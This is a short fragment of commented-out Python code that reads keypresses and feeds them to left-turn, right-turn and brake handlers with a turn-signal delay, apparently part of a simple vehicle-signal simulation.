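#       key = ord(msvcrt.getch())
#       output_turnl(input_turnl(key))
#       output_turnr(input_turnr(key))
#       output_brake(input_brake(key))
#       time.sleep(turnsignal_delay)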
|